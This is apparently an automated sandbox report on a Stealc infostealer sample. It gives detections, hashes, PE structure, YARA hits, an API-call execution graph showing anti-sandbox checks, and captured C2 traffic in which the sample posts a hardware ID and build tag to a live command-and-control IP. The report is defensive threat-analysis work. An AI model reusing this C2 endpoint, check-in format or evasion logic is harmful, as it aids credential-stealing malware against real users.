              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://185.215.113.20670%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              s-part-0017.t-0009.t-msedge.net
              		13.107.246.45
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/c4becf79229cb002.phpfalse
                  		high
                  http://185.215.113.206/false
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/c4becf79229cb002.php/file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://185.215.113.206/c4becf79229cb002.phpofile.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://185.215.113.206file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://185.215.113.206/c4becf79229cb002.php3file.exe, 00000000.00000002.2157021332.0000000001498000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://185.215.113.2067file.exe, 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.206
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1558834
                            Start date and time:2024-11-19 21:01:07 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 15s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 18
                            • Number of non-executed functions: 124
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.206file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, Cryptbot, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206/c4becf79229cb002.php
                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                            • 185.215.113.206/c4becf79229cb002.php

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            s-part-0017.t-0009.t-msedge.nethttps://online-e.net/st-manager/click/track?id=795&type=raw&url=https://msc-mu.com/apikey-tyudqnhzdgevhdbasx/secure-redirect%23Darth.Vader%2BDeathStar.com&source_url=https%3A%2F%2Fonline-e.net%2Feven-if-even-though%2F&source_title=Even%20if%E3%81%A8Even%20thoughGet hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            file.exeGet hashmaliciousAmadeyBrowse
                            • 13.107.246.45
                            https://brand.site/896562718995127961820892Get hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.45
                            file.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.45
                            https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9HMTAuZHpwdndvYnIucnUvdkd5c2dQdC8=Get hashmaliciousUnknownBrowse
                            • 13.107.246.45
                            file.exeGet hashmaliciousLummaCBrowse
                            • 13.107.246.45
                            https://nam.dcv.ms/WLtyQ3priBGet hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.45
                            http://itrack4.valuecommerce.ne.jp/cgi-bin/2366370/entry.php?vc_url=http://serviceoctopus.comGet hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.45
                            1.exeGet hashmaliciousDBatLoader, TVratBrowse
                            • 13.107.246.45
                            https://lu-trustt.com/l/security/2024Get hashmaliciousUnknownBrowse
                            • 13.107.246.45

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.43
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.43
                            file.exeGet hashmaliciousLummaCBrowse
                            • 185.215.113.16
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.206
                            file.exeGet hashmaliciousAmadeyBrowse
                            • 185.215.113.43
                            file.exeGet hashmaliciousAmadey, Cryptbot, Stealc, VidarBrowse
                            • 185.215.113.206

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.943391000067245
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'814'528 bytes
                            MD5:d90a0fa7d1b136c6aaa035f6bc5602fa
                            SHA1:1e236ca8b781f344a4738c1810b3c819ec72fac5
                            SHA256:136dfe4a8f2801c7836bb2518b2eb57142e57efb77a665830a00335fdfe0c2bd
                            SHA512:161375c3c6d2abea6d3697fe79832c1928cefd2529e222f444f057ffa282eed8e7780c683a64903f16732022f0629c26826abab4ceacf9b78cbaaaf3d805e67a
                            SSDEEP:49152:toBu4wjPsAgeUE+SERjvwfG1SxNGtvloF:+egJvOGkbKloF
                            TLSH:1C8533115B994625EC084C31685AAFF978CC04940F96EFDDEEC7174676A2BF3ACC0C69
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........8...k...k...k..'k...k...k...k..&k...k...k...k...k...k...j...k...k...k..#k...k...k...kRich...k........................PE..L..

                            File Icon

                            Icon Hash:00928e8e8686b000

                            Static PE Info

                            General

                            Entrypoint:0xa97000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x672FC34F [Sat Nov 9 20:17:19 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007F0B4939E98Ah
                            jng 00007F0B4939E9A1h
                            add byte ptr [eax], al
                            jmp 00007F0B493A0985h
                            add byte ptr [edi], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add al, 00h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], cl
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add eax, 0000000Ah
                            add byte ptr [eax], al
                            add byte ptr [eax], dh
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+00000000h], cl
                            add byte ptr [eax], al
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], cl
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x1ac.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x2490000x16200bcde4c9e6bcae76f8d3cec3a4d8b4aa9unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc0x24a0000x1ac0x200bd38996da8dd034899ebe3305f7ca4a8False0.580078125data4.55900838675945IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x24c0000x2a80000x200a4c36d8ee16fbe20c9ba8dce8face6a4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            smsoyiwh0x4f40000x1a20000x1a120059cc2be3edc0b8304f678f6031ee6909False0.9946275893392269data7.952862175295011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            mwymltiy0x6960000x10000x4004a95e2a0de6370b6e8657d771c96c98fFalse0.81640625data6.288569151500908IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6970000x30000x22006782a9e0e8ff5f86ae067150a97eede1False0.06606158088235294DOS executable (COM)0.7157932589078735IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Resources

                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_MANIFEST0x694f480x152ASCII text, with CRLF line terminators0.6479289940828402

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-11-19T21:02:10.401141+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.20680TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 19, 2024 21:02:09.444858074 CET4970480192.168.2.5185.215.113.206
                            Nov 19, 2024 21:02:09.449839115 CET8049704185.215.113.206192.168.2.5
                            Nov 19, 2024 21:02:09.449937105 CET4970480192.168.2.5185.215.113.206
                            Nov 19, 2024 21:02:09.450144053 CET4970480192.168.2.5185.215.113.206
                            Nov 19, 2024 21:02:09.454973936 CET8049704185.215.113.206192.168.2.5
                            Nov 19, 2024 21:02:10.159135103 CET8049704185.215.113.206192.168.2.5
                            Nov 19, 2024 21:02:10.159233093 CET4970480192.168.2.5185.215.113.206
                            Nov 19, 2024 21:02:10.175065041 CET4970480192.168.2.5185.215.113.206
                            Nov 19, 2024 21:02:10.180105925 CET8049704185.215.113.206192.168.2.5
                            Nov 19, 2024 21:02:10.401070118 CET8049704185.215.113.206192.168.2.5
                            Nov 19, 2024 21:02:10.401140928 CET4970480192.168.2.5185.215.113.206
                            Nov 19, 2024 21:02:13.669265985 CET4970480192.168.2.5185.215.113.206

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Nov 19, 2024 21:02:17.333076000 CET1.1.1.1192.168.2.50x4f80No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Nov 19, 2024 21:02:17.333076000 CET1.1.1.1192.168.2.50x4f80No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false

                            HTTP Request Dependency Graph

                            • 185.215.113.206

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.549704185.215.113.206805940C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Nov 19, 2024 21:02:09.450144053 CET90OUTGET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Nov 19, 2024 21:02:10.159135103 CET203INHTTP/1.1 200 OK
                            Date: Tue, 19 Nov 2024 20:02:10 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Nov 19, 2024 21:02:10.175065041 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----AKJEGCFBGDHJJJJJKJEC
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 31 32 44 31 42 45 38 37 35 41 37 34 31 36 38 38 36 39 30 35 35 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 45 47 43 46 42 47 44 48 4a 4a 4a 4a 4a 4b 4a 45 43 2d 2d 0d 0a
                            Data Ascii: ------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="hwid"112D1BE875A74168869055------AKJEGCFBGDHJJJJJKJECContent-Disposition: form-data; name="build"mars------AKJEGCFBGDHJJJJJKJEC--
                            Nov 19, 2024 21:02:10.401070118 CET210INHTTP/1.1 200 OK
                            Date: Tue, 19 Nov 2024 20:02:10 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            System Behavior

                            General

                            Target ID:0
                            Start time:15:02:04
                            Start date:19/11/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x7b0000
                            File size:1'814'528 bytes
                            MD5 hash:D90A0FA7D1B136C6AAA035F6BC5602FA
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2157021332.000000000143E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2116004330.0000000005160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true

                            Disassembly

                            Reset < >

                              Execution Graph

                              Execution Coverage:4.5%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:14.2%
                              Total number of Nodes:1397
                              Total number of Limit Nodes:29
                              execution_graph 27423 7b8c79 strlen malloc 27464 7b1b64 162 API calls 27479 7bbbf9 90 API calls 27461 7cf2f8 93 API calls 27436 7ce0f9 140 API calls 27465 7c6b79 138 API calls 27425 7c4c77 296 API calls 27426 7d8471 123 API calls 2 library calls 25971 7d1bf0 26023 7b2a90 25971->26023 25975 7d1c03 25976 7d1c29 lstrcpy 25975->25976 25977 7d1c35 25975->25977 25976->25977 25978 7d1c6d GetSystemInfo 25977->25978 25979 7d1c65 ExitProcess 25977->25979 25980 7d1c7d ExitProcess 25978->25980 25981 7d1c85 25978->25981 26124 7b1030 GetCurrentProcess VirtualAllocExNuma 25981->26124 25986 7d1cb8 26136 7d2ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25986->26136 25987 7d1ca2 25987->25986 25988 7d1cb0 ExitProcess 25987->25988 25990 7d1cbd 25991 7d1ce7 lstrlen 25990->25991 26345 7d2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25990->26345 25995 7d1cff 25991->25995 25993 7d1cd1 25993->25991 25998 7d1ce0 ExitProcess 25993->25998 25994 7d1d23 lstrlen 25996 7d1d39 25994->25996 25995->25994 25997 7d1d13 lstrcpy lstrcat 25995->25997 25999 7d1d5a 25996->25999 26000 7d1d46 lstrcpy lstrcat 25996->26000 25997->25994 26001 7d2ad0 3 API calls 25999->26001 26000->25999 26002 7d1d5f lstrlen 26001->26002 26005 7d1d74 26002->26005 26003 7d1d9a lstrlen 26004 7d1db0 26003->26004 26007 7d1dce 26004->26007 26008 7d1dba lstrcpy lstrcat 26004->26008 26005->26003 26006 7d1d87 lstrcpy lstrcat 26005->26006 26006->26003 26138 7d2a40 GetProcessHeap RtlAllocateHeap GetUserNameA 26007->26138 26008->26007 26010 7d1dd3 lstrlen 26011 7d1de7 26010->26011 26012 7d1df7 lstrcpy lstrcat 26011->26012 26013 7d1e0a 26011->26013 26012->26013 26014 7d1e28 lstrcpy 26013->26014 26015 7d1e30 26013->26015 26014->26015 26016 7d1e56 OpenEventA 26015->26016 26017 7d1e8c CreateEventA 26016->26017 26018 7d1e68 CloseHandle Sleep OpenEventA 26016->26018 26139 7d1b20 GetSystemTime 26017->26139 26018->26017 26018->26018 26022 7d1ea5 CloseHandle ExitProcess 26346 7b4a60 26023->26346 26025 7b2aa1 26026 7b4a60 2 API calls 26025->26026 26027 7b2ab7 26026->26027 26028 7b4a60 2 API calls 26027->26028 26029 7b2acd 26028->26029 26030 7b4a60 2 API calls 26029->26030 26031 7b2ae3 26030->26031 26032 7b4a60 2 API calls 26031->26032 26033 7b2af9 26032->26033 26034 7b4a60 2 API calls 26033->26034 26035 7b2b0f 26034->26035 26036 7b4a60 2 API calls 26035->26036 26037 7b2b28 26036->26037 26038 7b4a60 2 API calls 26037->26038 26039 7b2b3e 26038->26039 26040 7b4a60 2 API calls 26039->26040 26041 7b2b54 26040->26041 26042 7b4a60 2 API calls 26041->26042 26043 7b2b6a 26042->26043 26044 7b4a60 2 API calls 26043->26044 26045 7b2b80 26044->26045 26046 7b4a60 2 API calls 26045->26046 26047 7b2b96 26046->26047 26048 7b4a60 2 API calls 26047->26048 26049 7b2baf 26048->26049 26050 7b4a60 2 API calls 26049->26050 26051 7b2bc5 26050->26051 26052 7b4a60 2 API calls 26051->26052 26053 7b2bdb 26052->26053 26054 7b4a60 2 API calls 26053->26054 26055 7b2bf1 26054->26055 26056 7b4a60 2 API calls 26055->26056 26057 7b2c07 26056->26057 26058 7b4a60 2 API calls 26057->26058 26059 7b2c1d 26058->26059 26060 7b4a60 2 API calls 26059->26060 26061 7b2c36 26060->26061 26062 7b4a60 2 API calls 26061->26062 26063 7b2c4c 26062->26063 26064 7b4a60 2 API calls 26063->26064 26065 7b2c62 26064->26065 26066 7b4a60 2 API calls 26065->26066 26067 7b2c78 26066->26067 26068 7b4a60 2 API calls 26067->26068 26069 7b2c8e 26068->26069 26070 7b4a60 2 API calls 26069->26070 26071 7b2ca4 26070->26071 26072 7b4a60 2 API calls 26071->26072 26073 7b2cbd 26072->26073 26074 7b4a60 2 API calls 26073->26074 26075 7b2cd3 26074->26075 26076 7b4a60 2 API calls 26075->26076 26077 7b2ce9 26076->26077 26078 7b4a60 2 API calls 26077->26078 26079 7b2cff 26078->26079 26080 7b4a60 2 API calls 26079->26080 26081 7b2d15 26080->26081 26082 7b4a60 2 API calls 26081->26082 26083 7b2d2b 26082->26083 26084 7b4a60 2 API calls 26083->26084 26085 7b2d44 26084->26085 26086 7b4a60 2 API calls 26085->26086 26087 7b2d5a 26086->26087 26088 7b4a60 2 API calls 26087->26088 26089 7b2d70 26088->26089 26090 7b4a60 2 API calls 26089->26090 26091 7b2d86 26090->26091 26092 7b4a60 2 API calls 26091->26092 26093 7b2d9c 26092->26093 26094 7b4a60 2 API calls 26093->26094 26095 7b2db2 26094->26095 26096 7b4a60 2 API calls 26095->26096 26097 7b2dcb 26096->26097 26098 7b4a60 2 API calls 26097->26098 26099 7b2de1 26098->26099 26100 7b4a60 2 API calls 26099->26100 26101 7b2df7 26100->26101 26102 7b4a60 2 API calls 26101->26102 26103 7b2e0d 26102->26103 26104 7b4a60 2 API calls 26103->26104 26105 7b2e23 26104->26105 26106 7b4a60 2 API calls 26105->26106 26107 7b2e39 26106->26107 26108 7b4a60 2 API calls 26107->26108 26109 7b2e52 26108->26109 26110 7d6390 GetPEB 26109->26110 26111 7d65c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 26110->26111 26116 7d63c3 26110->26116 26112 7d6638 26111->26112 26113 7d6625 GetProcAddress 26111->26113 26114 7d666c 26112->26114 26115 7d6641 GetProcAddress GetProcAddress 26112->26115 26113->26112 26117 7d6688 26114->26117 26118 7d6675 GetProcAddress 26114->26118 26115->26114 26121 7d63d7 20 API calls 26116->26121 26119 7d66a4 26117->26119 26120 7d6691 GetProcAddress 26117->26120 26118->26117 26122 7d66ad GetProcAddress GetProcAddress 26119->26122 26123 7d66d7 26119->26123 26120->26119 26121->26111 26122->26123 26123->25975 26125 7b105e VirtualAlloc 26124->26125 26126 7b1057 ExitProcess 26124->26126 26127 7b107d 26125->26127 26128 7b108a VirtualFree 26127->26128 26129 7b10b1 26127->26129 26128->26129 26130 7b10c0 26129->26130 26131 7b10d0 GlobalMemoryStatusEx 26130->26131 26133 7b1112 ExitProcess 26131->26133 26134 7b10f5 26131->26134 26134->26133 26135 7b111a GetUserDefaultLangID 26134->26135 26135->25986 26135->25987 26137 7d2b24 26136->26137 26137->25990 26138->26010 26351 7d1820 26139->26351 26141 7d1b81 sscanf 26390 7b2a20 26141->26390 26144 7d1be9 26147 7cffd0 26144->26147 26145 7d1bd6 26145->26144 26146 7d1be2 ExitProcess 26145->26146 26148 7cffe0 26147->26148 26149 7d000d lstrcpy 26148->26149 26150 7d0019 lstrlen 26148->26150 26149->26150 26151 7d00d0 26150->26151 26152 7d00db lstrcpy 26151->26152 26153 7d00e7 lstrlen 26151->26153 26152->26153 26154 7d00ff 26153->26154 26155 7d010a lstrcpy 26154->26155 26156 7d0116 lstrlen 26154->26156 26155->26156 26157 7d012e 26156->26157 26158 7d0139 lstrcpy 26157->26158 26159 7d0145 26157->26159 26158->26159 26392 7d1570 26159->26392 26162 7d016e 26163 7d018f lstrlen 26162->26163 26164 7d0183 lstrcpy 26162->26164 26165 7d01a8 26163->26165 26164->26163 26166 7d01bd lstrcpy 26165->26166 26167 7d01c9 lstrlen 26165->26167 26166->26167 26168 7d01e8 26167->26168 26169 7d020c lstrlen 26168->26169 26170 7d0200 lstrcpy 26168->26170 26171 7d026a 26169->26171 26170->26169 26172 7d0282 lstrcpy 26171->26172 26173 7d028e 26171->26173 26172->26173 26402 7b2e70 26173->26402 26181 7d0540 26182 7d1570 4 API calls 26181->26182 26183 7d054f 26182->26183 26184 7d05a1 lstrlen 26183->26184 26185 7d0599 lstrcpy 26183->26185 26186 7d05bf 26184->26186 26185->26184 26187 7d05d1 lstrcpy lstrcat 26186->26187 26188 7d05e9 26186->26188 26187->26188 26189 7d0614 26188->26189 26190 